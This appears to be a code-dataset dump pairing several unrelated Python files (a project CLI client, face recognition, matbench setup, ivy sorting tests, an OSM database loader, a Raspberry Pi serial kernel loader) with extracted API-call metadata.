| code (string, 22-1.05M chars) | apis (list, 1-3.31k items) | extract_api (string, 75-3.25M chars) |
|---|---|---|
# PYTHON_ARGCOMPLETE_OK
from signal import signal, SIGPIPE, SIG_DFL
# Ignore SIGPIPE and don't throw exceptions on it (http://docs.python.org/library/signal.html)
signal(SIGPIPE,SIG_DFL)
from projectdb_api import projectdb_api, PROJECTDB_DEFAULT_URL, POSITIONAL_ARG_REGISTRY
from projectdb_models import *
import argparse
import os
import ConfigParser
import sys
import logging
from pprint import pprint, pformat
from booby import Model
from pyclist.pyclist import pyclist,is_api_method
CONF_FILENAME = 'proji.conf'
CONF_HOME = os.path.expanduser('~/.'+CONF_FILENAME)
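# Expected layout of proji.conf (inferred from the lookups below; named profiles
# may additionally provide their own 'url' and 'token' sections):
#   [default]
#   url = ...
#   username = ...
#   token = ...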
class ProjiConfig(object):
def __init__(self):
self.config = ConfigParser.SafeConfigParser()
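        # When run via sudo, prefer the invoking user's config file over root's.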
try:
user = os.environ['SUDO_USER']
conf_user = os.path.expanduser('~'+user+"/."+CONF_FILENAME)
candidates = [conf_user, CONF_HOME]
except KeyError:
candidates = [CONF_HOME]
self.config.read(candidates)
try:
self.projectdb_url = self.config.get('default', 'url')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_url = PROJECTDB_DEFAULT_URL
try:
self.projectdb_username = self.config.get('default', 'username')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_username = None
try:
self.projectdb_token = self.config.get('default', 'token')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_token = None
class Proji(object):
def __init__(self):
self.config = ProjiConfig()
self.cli = pyclist('proj', 'A commandline client for CeR project management.')
self.cli.root_parser.add_argument('--url', '-u', help='Projectdb base url', default=self.config.projectdb_url)
self.cli.root_parser.add_argument('--username', help='Projectdb username', default=self.config.projectdb_username)
        self.cli.root_parser.add_argument('--token', help='Projectdb token', default=self.config.projectdb_token)
self.cli.root_parser.add_argument('--profile', '-p', help='Profile to use (profile must be defined in ~/.proji.conf)')
self.cli.root_parser.add_argument('--output', '-o', help='Filter output format')
self.cli.root_parser.add_argument('--separator', '-s', default='\n', help='Separator for output, useful to create a comma-separated list of ids. Default is new-line')
self.cli.add_command(projectdb_api, POSITIONAL_ARG_REGISTRY)
self.cli.parse_arguments()
if self.cli.namespace.profile:
self.cli.parameters['url'] = self.config.config.get(self.cli.namespace.profile, 'url')
self.cli.parameters['token'] = self.config.config.get(self.cli.namespace.profile, 'token')
self.url = self.cli.namespace.url
self.username = self.cli.namespace.username
self.token = self.cli.namespace.token
self.cli.execute()
self.output = self.cli.namespace.output
self.separator = self.cli.namespace.separator
self.cli.print_result(self.output, self.separator)
def run():
Proji()
|
[
"ConfigParser.SafeConfigParser",
"signal.signal",
"os.path.expanduser",
"pyclist.pyclist.pyclist"
] |
[((168, 192), 'signal.signal', 'signal', (['SIGPIPE', 'SIG_DFL'], {}), '(SIGPIPE, SIG_DFL)\n', (174, 192), False, 'from signal import signal, SIGPIPE, SIG_DFL\n'), ((535, 576), 'os.path.expanduser', 'os.path.expanduser', (["('~/.' + CONF_FILENAME)"], {}), "('~/.' + CONF_FILENAME)\n", (553, 576), False, 'import os\n'), ((650, 681), 'ConfigParser.SafeConfigParser', 'ConfigParser.SafeConfigParser', ([], {}), '()\n', (679, 681), False, 'import ConfigParser\n'), ((1696, 1763), 'pyclist.pyclist.pyclist', 'pyclist', (['"""proj"""', '"""A commandline client for CeR project management."""'], {}), "('proj', 'A commandline client for CeR project management.')\n", (1703, 1763), False, 'from pyclist.pyclist import pyclist, is_api_method\n'), ((763, 816), 'os.path.expanduser', 'os.path.expanduser', (["('~' + user + '/.' + CONF_FILENAME)"], {}), "('~' + user + '/.' + CONF_FILENAME)\n", (781, 816), False, 'import os\n')]
|
#!/usr/bin/env python3
import face_recognition
import yaml
from buzz.logger import log
with open("/home/pi/buzz-rpi/buzz/config.yml", "r") as config_file:
CONFIG = yaml.load(config_file, Loader=yaml.FullLoader)
def process_visitor_images(visitor_info):
known_face_encodings = []
known_face_names = []
for key, value in visitor_info.items():
image = face_recognition.load_image_file(
CONFIG["visitors"]["photos_target"] + key + ".jpg")
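        # num_jitters=100 re-samples each face 100 times for a more robust encoding (slower).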
face_encoding = face_recognition.face_encodings(image, num_jitters=100)[0]
known_face_encodings.append(face_encoding)
known_face_names.append(value['firstName'] + " " + value['lastName'])
log(f"Visitor {key} processed and ready")
return (known_face_encodings, known_face_names)
|
[
"face_recognition.face_encodings",
"buzz.logger.log",
"yaml.load",
"face_recognition.load_image_file"
] |
[((171, 217), 'yaml.load', 'yaml.load', (['config_file'], {'Loader': 'yaml.FullLoader'}), '(config_file, Loader=yaml.FullLoader)\n', (180, 217), False, 'import yaml\n'), ((378, 466), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (["(CONFIG['visitors']['photos_target'] + key + '.jpg')"], {}), "(CONFIG['visitors']['photos_target'] + key +\n '.jpg')\n", (410, 466), False, 'import face_recognition\n'), ((696, 737), 'buzz.logger.log', 'log', (['f"""Visitor {key} processed and ready"""'], {}), "(f'Visitor {key} processed and ready')\n", (699, 737), False, 'from buzz.logger import log\n'), ((500, 555), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['image'], {'num_jitters': '(100)'}), '(image, num_jitters=100)\n', (531, 555), False, 'import face_recognition\n')]
|
import os
from setuptools import setup, find_packages
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(MODULE_DIR, "requirements.txt"), "r") as f:
requirements = f.read().replace(" ", "").split("\n")
# source of version is in the constants file
VERSION_FILE = os.path.join(MODULE_DIR, "matbench/constants.py")
token = "VERSION = "
with open(VERSION_FILE, "r") as f:
version = None
for line in f.readlines():
if token in line:
version = line.replace(token, "").strip()
# Double quotes are contained in the read line, remove them
version = version.replace("\"", "")
if __name__ == "__main__":
setup(
name='matbench',
version=version,
description='a machine learning benchmark for materials science',
long_description="A machine learning benchmark for materials science. "
"https://github.com/materialsproject/matbench",
url='https://github.com/materialsproject/matbench',
author=['<NAME>', '<NAME>'],
author_email='<EMAIL>',
license='modified BSD',
packages=find_packages(where="."),
package_data={
"matbench": ["*.json"],
"matbench.tests": ["*.json"]
},
zip_safe=False,
install_requires=requirements,
extras_require={},
test_suite='matbench',
tests_require='tests',
include_package_data=True
)
|
[
"os.path.abspath",
"os.path.join",
"setuptools.find_packages"
] |
[((296, 345), 'os.path.join', 'os.path.join', (['MODULE_DIR', '"""matbench/constants.py"""'], {}), "(MODULE_DIR, 'matbench/constants.py')\n", (308, 345), False, 'import os\n'), ((84, 109), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (99, 109), False, 'import os\n'), ((121, 165), 'os.path.join', 'os.path.join', (['MODULE_DIR', '"""requirements.txt"""'], {}), "(MODULE_DIR, 'requirements.txt')\n", (133, 165), False, 'import os\n'), ((1123, 1147), 'setuptools.find_packages', 'find_packages', ([], {'where': '"""."""'}), "(where='.')\n", (1136, 1147), False, 'from setuptools import setup, find_packages\n')]
|
"""Collection of tests for sorting functions."""
# global
from hypothesis import given, strategies as st
import numpy as np
# local
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# argsort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="argsort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_argsort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
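    # (NaNs have no well-defined sort order, so results would differ across backends.)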
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"argsort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
# sort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="sort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_sort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"sort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
|
[
"hypothesis.strategies.data",
"ivy_tests.test_ivy.helpers.num_positional_args",
"ivy_tests.test_ivy.helpers.test_array_function",
"hypothesis.strategies.sampled_from",
"numpy.isnan",
"hypothesis.strategies.booleans",
"hypothesis.strategies.integers",
"ivy_tests.test_ivy.helpers.nph.arrays"
] |
[((1313, 1516), 'ivy_tests.test_ivy.helpers.test_array_function', 'helpers.test_array_function', (['input_dtype', 'as_variable', 'with_out', 'num_positional_args', 'native_array', 'container', 'instance_method', 'fw', '"""argsort"""'], {'x': 'x', 'axis': 'axis', 'descending': 'descending', 'stable': 'stable'}), "(input_dtype, as_variable, with_out,\n num_positional_args, native_array, container, instance_method, fw,\n 'argsort', x=x, axis=axis, descending=descending, stable=stable)\n", (1340, 1516), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((2698, 2898), 'ivy_tests.test_ivy.helpers.test_array_function', 'helpers.test_array_function', (['input_dtype', 'as_variable', 'with_out', 'num_positional_args', 'native_array', 'container', 'instance_method', 'fw', '"""sort"""'], {'x': 'x', 'axis': 'axis', 'descending': 'descending', 'stable': 'stable'}), "(input_dtype, as_variable, with_out,\n num_positional_args, native_array, container, instance_method, fw,\n 'sort', x=x, axis=axis, descending=descending, stable=stable)\n", (2725, 2898), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1198, 1226), 'hypothesis.strategies.integers', 'st.integers', (['(-ndim)', '(ndim - 1)'], {}), '(-ndim, ndim - 1)\n', (1209, 1226), True, 'from hypothesis import given, strategies as st\n'), ((1255, 1268), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1266, 1268), True, 'from hypothesis import given, strategies as st\n'), ((1293, 1306), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1304, 1306), True, 'from hypothesis import given, strategies as st\n'), ((388, 424), 'hypothesis.strategies.sampled_from', 'st.sampled_from', (['ivy_np.valid_dtypes'], {}), '(ivy_np.valid_dtypes)\n', (403, 424), True, 'from hypothesis import given, strategies as st\n'), ((435, 444), 'hypothesis.strategies.data', 'st.data', ([], {}), '()\n', (442, 444), True, 'from hypothesis import given, strategies as st\n'), ((462, 475), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (473, 475), True, 'from hypothesis import given, strategies as st\n'), ((490, 503), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (501, 503), True, 'from hypothesis import given, strategies as st\n'), ((529, 575), 'ivy_tests.test_ivy.helpers.num_positional_args', 'helpers.num_positional_args', ([], {'fn_name': '"""argsort"""'}), "(fn_name='argsort')\n", (556, 575), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((594, 607), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (605, 607), True, 'from hypothesis import given, strategies as st\n'), ((623, 636), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (634, 636), True, 'from hypothesis import given, strategies as st\n'), ((658, 671), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (669, 671), True, 'from hypothesis import given, strategies as st\n'), ((2583, 2611), 'hypothesis.strategies.integers', 'st.integers', (['(-ndim)', '(ndim - 1)'], {}), '(-ndim, ndim - 1)\n', (2594, 2611), True, 'from hypothesis import given, strategies as st\n'), ((2640, 2653), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2651, 2653), True, 'from hypothesis import given, strategies as st\n'), ((2678, 2691), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2689, 2691), True, 'from hypothesis import given, strategies as st\n'), ((1779, 1815), 'hypothesis.strategies.sampled_from', 'st.sampled_from', (['ivy_np.valid_dtypes'], {}), '(ivy_np.valid_dtypes)\n', (1794, 1815), True, 'from hypothesis import given, strategies as st\n'), ((1826, 1835), 'hypothesis.strategies.data', 'st.data', ([], {}), '()\n', (1833, 1835), True, 'from hypothesis import given, strategies as st\n'), ((1853, 1866), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1864, 1866), True, 'from hypothesis import given, strategies as st\n'), ((1881, 1894), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1892, 1894), True, 'from hypothesis import given, strategies as st\n'), ((1920, 1963), 'ivy_tests.test_ivy.helpers.num_positional_args', 'helpers.num_positional_args', ([], {'fn_name': '"""sort"""'}), "(fn_name='sort')\n", (1947, 1963), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1982, 1995), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1993, 1995), True, 'from hypothesis import given, strategies as st\n'), ((2011, 2024), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2022, 2024), True, 'from hypothesis import given, strategies as st\n'), ((2046, 2059), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2057, 2059), True, 'from hypothesis import given, strategies as st\n'), ((285, 302), 'hypothesis.strategies.integers', 'st.integers', (['(1)', '(5)'], {}), '(1, 5)\n', (296, 302), True, 'from hypothesis import given, strategies as st\n'), ((1676, 1693), 'hypothesis.strategies.integers', 'st.integers', (['(1)', '(5)'], {}), '(1, 5)\n', (1687, 1693), True, 'from hypothesis import given, strategies as st\n'), ((1025, 1081), 'ivy_tests.test_ivy.helpers.nph.arrays', 'helpers.nph.arrays', ([], {'shape': 'array_shape', 'dtype': 'input_dtype'}), '(shape=array_shape, dtype=input_dtype)\n', (1043, 1081), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((2410, 2466), 'ivy_tests.test_ivy.helpers.nph.arrays', 'helpers.nph.arrays', ([], {'shape': 'array_shape', 'dtype': 'input_dtype'}), '(shape=array_shape, dtype=input_dtype)\n', (2428, 2466), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1123, 1134), 'numpy.isnan', 'np.isnan', (['x'], {}), '(x)\n', (1131, 1134), True, 'import numpy as np\n'), ((2508, 2519), 'numpy.isnan', 'np.isnan', (['x'], {}), '(x)\n', (2516, 2519), True, 'import numpy as np\n')]
|
from tango import mixxx_main
#
# Use a playlist named 'Timer' for timing purposes. Fill it with tandas you want timed.
#
if __name__ == '__main__':
mixxx_main(query='Timer', timer=True, embed=False)
|
[
"tango.mixxx_main"
] |
[((154, 204), 'tango.mixxx_main', 'mixxx_main', ([], {'query': '"""Timer"""', 'timer': '(True)', 'embed': '(False)'}), "(query='Timer', timer=True, embed=False)\n", (164, 204), False, 'from tango import mixxx_main\n')]
|
from misc import save_pickle_data, distance_diff
data = [
(0, 45.8242, 15.906),
(1, 45.8135, 15.949),
(2, 45.8129, 15.9594),
(3, 45.8123, 15.9808),
(4, 45.8161, 16.0105),
(5, 45.819, 16.0505),
(6, 45.7999, 15.9201),
(7, 45.801, 15.9324),
(8, 45.7982, 15.9642),
(9, 45.7963, 15.9805), # depot
(10, 45.7964, 16.0152),
(11, 45.7996, 16.0365),
(12, 45.7988, 16.0787),
(13, 45.781, 15.9071),
(14, 45.7848, 15.9315),
(15, 45.7824, 15.9783),
(16, 45.7839, 16.0318),
(17, 45.7847, 16.0636),
(18, 45.7617, 15.906),
(19, 45.7518, 15.9455),
(20, 45.7519, 15.9929),
(21, 45.7536, 16.0384)
]
points = list()
ex_counter = 0
for i in range(0, len(data)):
points.append({'osm_id': None,
'id': i,
'lat': float(data[i][1]),
'lon': float(data[i][2])})
distance_matrix = list([])
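# Build the full pairwise distance matrix; diagonal entries are zero.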
for i in range(0, len(points)):
curr = points[i]
temp = list([])
for j in range(0, len(points)):
if i == j:
temp.append(0)
continue
next_ = points[j]
distance = distance_diff(curr['lat'], curr['lon'], next_['lat'], next_['lon'])
temp.append(int(distance))
distance_matrix.append(temp)
print()
save_pickle_data('small_distance_matrix.pkl', distance_matrix)
|
[
"misc.save_pickle_data",
"misc.distance_diff"
] |
[((1290, 1352), 'misc.save_pickle_data', 'save_pickle_data', (['"""small_distance_matrix.pkl"""', 'distance_matrix'], {}), "('small_distance_matrix.pkl', distance_matrix)\n", (1306, 1352), False, 'from misc import save_pickle_data, distance_diff\n'), ((1143, 1210), 'misc.distance_diff', 'distance_diff', (["curr['lat']", "curr['lon']", "next_['lat']", "next_['lon']"], {}), "(curr['lat'], curr['lon'], next_['lat'], next_['lon'])\n", (1156, 1210), False, 'from misc import save_pickle_data, distance_diff\n')]
|
#!/usr/bin/env python3
import psycopg2
import psycopg2.errorcodes
import time
import sys, os
import gzip
import html
import re
import fileinput
#
# Set the following environment variables, or use the PostgreSQL defaults:
# PGHOST, PGPORT, PGUSER, PGPASSWORD, PGDATABASE
#
# curl -s -k http://localhost:8000/osm_1m_eu.txt.gz | gunzip - | ./load_osm_stdin.py
#
rows_per_batch = 10000 # Edit as necessary, but 10k rows is a good starting point
database = os.getenv("PGDATABASE", "defaultdb")
# This is the list of sites where our "tourist" will initially appear upon a page load
sites = []
sites.append({"name": "High density pub area, London", "lat": 51.51214599609375, "lon": -0.0823974609375})
sites.append({"name": "British Museum", "lat": 51.519844, "lon": -0.126731})
sites.append({"name": "Trafalgar Square", "lat": 51.506712, "lon": -0.127235})
sites.append({"name": "Borough Market", "lat": 51.505435, "lon": -0.090446})
sites.append({"name": "Tate Modern", "lat": 51.508337, "lon": -0.099281})
sites.append({"name": "Dublin", "lat": 53.346028, "lon": -6.279658})
sites.append({"name": "Munich", "lat": 48.135056, "lon": 11.576097})
sites.append({"name": "Le Marais", "lat": 48.857744, "lon": 2.357768})
sites.append({"name": "Trastevere", "lat": 41.886071, "lon": 12.467422})
conn = None
def get_db():
global conn
if conn is None:
conn = psycopg2.connect(
database=database
, user=os.getenv("PGUSER", "root")
, port=int(os.getenv("PGPORT", "26257"))
, host=os.getenv("PGHOST", "localhost")
, application_name="OSM Data Loader"
)
return conn
def close_db():
global conn
if conn is not None:
conn.close()
conn = None
def insert_row(sql, close=False):
conn = get_db()
with conn.cursor() as cur:
try:
cur.execute(sql)
#n_ins = cur.rowcount
except Exception as e:
print("execute(sql): ", e)
sys.exit(1)
try:
conn.commit()
except Exception as e:
print("commit(): ", e)
print("Retrying commit() in 1 s")
time.sleep(1)
conn.commit()
if close:
close_db()
def setup_db():
conn = get_db()
with conn.cursor() as cur:
sql = """
SELECT COUNT(*) FROM crdb_internal.tables
WHERE name = 'osm' AND database_name = %s AND state = 'PUBLIC';
"""
n = 0
cur.execute(sql, (database,))
n = cur.fetchone()[0]
if int(n) == 0:
sql = """
DROP TABLE IF EXISTS osm;
CREATE TABLE osm
(
id BIGINT
, date_time TIMESTAMP WITH TIME ZONE
, uid TEXT
, name TEXT
, key_value TEXT[]
, ref_point GEOGRAPHY
, geohash4 TEXT
, CONSTRAINT "primary" PRIMARY KEY (geohash4 ASC, id ASC)
);
"""
print("Creating osm table")
cur.execute(sql)
sql = "CREATE INDEX ON osm USING GIN(ref_point);"
print("Creating index on ref_point")
cur.execute(sql)
# Table of positions for the user
sql = """
DROP TABLE IF EXISTS tourist_locations;
CREATE TABLE tourist_locations
(
name TEXT
, lat FLOAT8
, lon FLOAT8
, enabled BOOLEAN DEFAULT TRUE
, geohash CHAR(9) AS (ST_GEOHASH(ST_SETSRID(ST_MAKEPOINT(lon, lat), 4326), 9)) STORED
, CONSTRAINT "primary" PRIMARY KEY (geohash ASC)
);
"""
print("Creating tourist_locations table")
cur.execute(sql)
sql = "INSERT INTO tourist_locations (name, lat, lon) VALUES (%s, %s, %s);"
print("Populating tourist_locations table")
for s in sites:
cur.execute(sql, (s["name"], s["lat"], s["lon"]))
conn.commit()
sql = "INSERT INTO osm (id, date_time, uid, name, key_value, ref_point, geohash4) VALUES "
vals = []
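# llre accepts only plain decimal lat/lon values; bad_re matches the stray "N rows: ..." lines noted below.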
llre = re.compile(r"^-?\d+\.\d+$")
bad_re = re.compile(r"^N rows: \d+$")
n_rows_ins = 0 # Rows inserted
n_line = 0 # Position in input file
n_batch = 1
setup_db()
for line in fileinput.input():
line = line.rstrip()
n_line += 1
# Get past malformed lines due to printing row counts to stdout in Perl data prep script :-o
if bad_re.match(line):
continue
# 78347 <2018-08-09T22:29:35Z <366321 <63.4305942 <10.3921538 <Prinsenkrysset <highway=traffic_signals|u5r|u5r2|u5r2u|u5r2u7 <u5r2u7pmfxz8b
a = line.split('<')
if 8 != len(a):
continue
(id, dt, uid, lat, lon, name, kvagg, geohash) = a
# (lat, lon) may have this format: 54°05.131'..., which is bogus
if (not llre.match(lat)) or (not llre.match(lon)):
continue
row = str(id) + ", '" + dt + "', '" + uid + "', '" + html.unescape(name).replace("'", "''") + "'"
# Clean up all the kv data
kv = []
# Add the words in the name onto kv
for w in re.split(r"\W+", name.lower()):
if len(w) > 0:
kv.append(w)
for x in kvagg.split('|'):
if len(x) == 0:
            continue
x = html.unescape(x)
x = re.sub(r"['\",{}]", "", x)
kv.append(x)
row += ", '{" + ','.join(kv) + "}'"
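    # Store the point as GEOGRAPHY and keep a 4-char geohash prefix, which leads the primary key so nearby rows cluster together.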
row += ", ST_MakePoint(" + lon + ", " + lat + ")::GEOGRAPHY, '" + geohash[0:4] + "'"
vals.append("(" + row + ")")
if len(vals) % rows_per_batch == 0:
print("Running INSERT for batch %d of %d rows" % (n_batch, rows_per_batch))
t0 = time.time()
insert_row(sql + ', '.join(vals))
n_rows_ins += rows_per_batch
vals.clear()
t1 = time.time()
print("INSERT for batch %d of %d rows took %.2f s" % (n_batch, rows_per_batch, t1 - t0))
n_batch += 1
# Last bit
if len(vals) > 0:
insert_row(sql + ', '.join(vals))
    n_rows_ins += len(vals)  # the final batch may be smaller than rows_per_batch
close_db()
|
[
"html.unescape",
"fileinput.input",
"time.time",
"time.sleep",
"re.sub",
"os.getenv",
"sys.exit",
"re.compile"
] |
[((455, 491), 'os.getenv', 'os.getenv', (['"""PGDATABASE"""', '"""defaultdb"""'], {}), "('PGDATABASE', 'defaultdb')\n", (464, 491), False, 'import sys, os\n'), ((3727, 3756), 're.compile', 're.compile', (['"""^-?\\\\d+\\\\.\\\\d+$"""'], {}), "('^-?\\\\d+\\\\.\\\\d+$')\n", (3737, 3756), False, 'import re\n'), ((3764, 3792), 're.compile', 're.compile', (['"""^N rows: \\\\d+$"""'], {}), "('^N rows: \\\\d+$')\n", (3774, 3792), False, 'import re\n'), ((3897, 3914), 'fileinput.input', 'fileinput.input', ([], {}), '()\n', (3912, 3914), False, 'import fileinput\n'), ((4797, 4813), 'html.unescape', 'html.unescape', (['x'], {}), '(x)\n', (4810, 4813), False, 'import html\n'), ((4822, 4849), 're.sub', 're.sub', (['"""[\'\\\\",{}]"""', '""""""', 'x'], {}), '(\'[\\\'\\\\",{}]\', \'\', x)\n', (4828, 4849), False, 'import re\n'), ((5149, 5160), 'time.time', 'time.time', ([], {}), '()\n', (5158, 5160), False, 'import time\n'), ((5258, 5269), 'time.time', 'time.time', ([], {}), '()\n', (5267, 5269), False, 'import time\n'), ((2023, 2036), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2033, 2036), False, 'import time\n'), ((1413, 1440), 'os.getenv', 'os.getenv', (['"""PGUSER"""', '"""root"""'], {}), "('PGUSER', 'root')\n", (1422, 1440), False, 'import sys, os\n'), ((1501, 1533), 'os.getenv', 'os.getenv', (['"""PGHOST"""', '"""localhost"""'], {}), "('PGHOST', 'localhost')\n", (1510, 1533), False, 'import sys, os\n'), ((1892, 1903), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1900, 1903), False, 'import sys, os\n'), ((1458, 1486), 'os.getenv', 'os.getenv', (['"""PGPORT"""', '"""26257"""'], {}), "('PGPORT', '26257')\n", (1467, 1486), False, 'import sys, os\n'), ((4521, 4540), 'html.unescape', 'html.unescape', (['name'], {}), '(name)\n', (4534, 4540), False, 'import html\n')]
|
import serial
import struct
import time
import sys
import os
import tty
import select
def init_Serial(serial_port):
print("Opening Serial Port ",serial_port)
ser = serial.Serial(
port=serial_port,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
return ser
def wait_for_Pi(addr,ser_i,size):
print("### Wait until Raspberry Pi is ready......")
try:
addr = long(addr,0)
if(addr<0x80000 and addr > 0x7F800):
print("Input address may overlap loader, change to default 0x80000")
addr = 0x80000
elif (addr<0x7F800 and addr + size >0x7F800):
print("Input address may overlap loader, change to default 0x80000")
addr = 0x80000
except ValueError:
addr = 0x80000
print("Invalid address for booting, using default", addr)
# write 'c' to trigger
ser_i.write('c')
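    # Send the 32-bit load address in little-endian order ('<l'), one byte at a time.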
    print('Setting image at address:', addr)
    address = struct.pack('<l', addr)
for i in address:
ser_i.write(i)
cnt = 0
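    # The Pi signals that it is ready by sending three 0x03 bytes.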
while cnt < 3:
x = ser_i.read()
if x == '\x03':
cnt = cnt + 1
print("### Raspberry is ready!")
def open_Kernel(kernel_file):
fid = open(kernel_file, "rb")
# Get binaries
data = fid.read()
# Get file size
## (After read, the cursor will point to the end of file,
## which means the size of the file)
f_size = fid.tell()
print("### Kernel image size: %d bytes" % f_size)
    fid.close()
return f_size, data
def send_Kernel_size(ser_i, size):
print("\n### Sending Kernel size to RPI")
# send size with little endian
data = struct.pack('<i',size)
for i in data:
ser_i.write(i)
    print("### Waiting for size check on Raspberry Pi......")
# read 2 bytes
recv = ser_i.read(2)
if recv == "OK":
print("### Received Acknowledgment!")
else:
print("Error after sending size")
print("Restart")
return False
return True
def send_Kernel(ser_i, kernel_data):
print("### Sending kernel now......")
start = time.time()
for tmp, byte in enumerate(kernel_data):
ser_i.write(byte)
end = time.time()
    print("Elapsed time: ", end - start)
print("### Finished sending!")
return True
def start_interactive(ser,input_file,output_file):
try:
# set tty to cbreak mode
tty.setcbreak(input_file.fileno())
while True:
rfd, _, _ = select.select([ser, input_file], [], [])
if ser in rfd:
r = ser.read(ser.in_waiting).decode("ascii")
output_file.write(r)
output_file.flush()
if input_file in rfd:
r = input_file.read(1)
ser.write(bytes(r.encode("ascii")))
except KeyboardInterrupt:
print("Got keyboard interrupt. Terminating...")
except OSError as e:
print("Got OSError. Terminating...")
finally:
os.system("stty sane")
def main():
if (len(sys.argv) == 3):
serial_port = sys.argv[1]
kernel_img = sys.argv[2]
else:
print("Arguments wrong! Please check it again!")
sys.exit()
    # Build connection to the target serial port
ser_i = init_Serial(serial_port)
print("### Serial init success!!")
a = raw_input("### Power on Raspberry Pi and input load address to load kernel img:\n>>")
# load kernel first, so we can check if it will overlap our loader yet.
size, kernel_data = open_Kernel(kernel_img)
## send 'c' to Pi and wait for '\x03\x03\x03' send back
wait_for_Pi(a,ser_i,size)
guard = send_Kernel_size(ser_i, size)
if(guard == True):
send_Kernel(ser_i, kernel_data)
start_interactive(ser_i,sys.stdin,sys.stdout)
if __name__ == "__main__":
main()
|
[
"serial.Serial",
"os.system",
"struct.pack",
"time.time",
"select.select",
"sys.exit"
] |
[((175, 311), 'serial.Serial', 'serial.Serial', ([], {'port': 'serial_port', 'baudrate': '(115200)', 'parity': 'serial.PARITY_NONE', 'stopbits': 'serial.STOPBITS_ONE', 'bytesize': 'serial.EIGHTBITS'}), '(port=serial_port, baudrate=115200, parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)\n', (188, 311), False, 'import serial\n'), ((1063, 1086), 'struct.pack', 'struct.pack', (['"""<l"""', 'addr'], {}), "('<l', addr)\n", (1074, 1086), False, 'import struct\n'), ((1773, 1796), 'struct.pack', 'struct.pack', (['"""<i"""', 'size'], {}), "('<i', size)\n", (1784, 1796), False, 'import struct\n'), ((2232, 2243), 'time.time', 'time.time', ([], {}), '()\n', (2241, 2243), False, 'import time\n'), ((2325, 2336), 'time.time', 'time.time', ([], {}), '()\n', (2334, 2336), False, 'import time\n'), ((3190, 3212), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (3199, 3212), False, 'import os\n'), ((3399, 3409), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3407, 3409), False, 'import sys\n'), ((2632, 2672), 'select.select', 'select.select', (['[ser, input_file]', '[]', '[]'], {}), '([ser, input_file], [], [])\n', (2645, 2672), False, 'import select\n')]
|
#!/usr/bin/env python
import Queue
import thread
import time
from dronekit import connect
from pymavlink import mavutil
#from sensor_msgs.msg import NavSatFix, BatteryState
#from std_msgs.msg import Float64
from models.message import Message
from config.config import Config
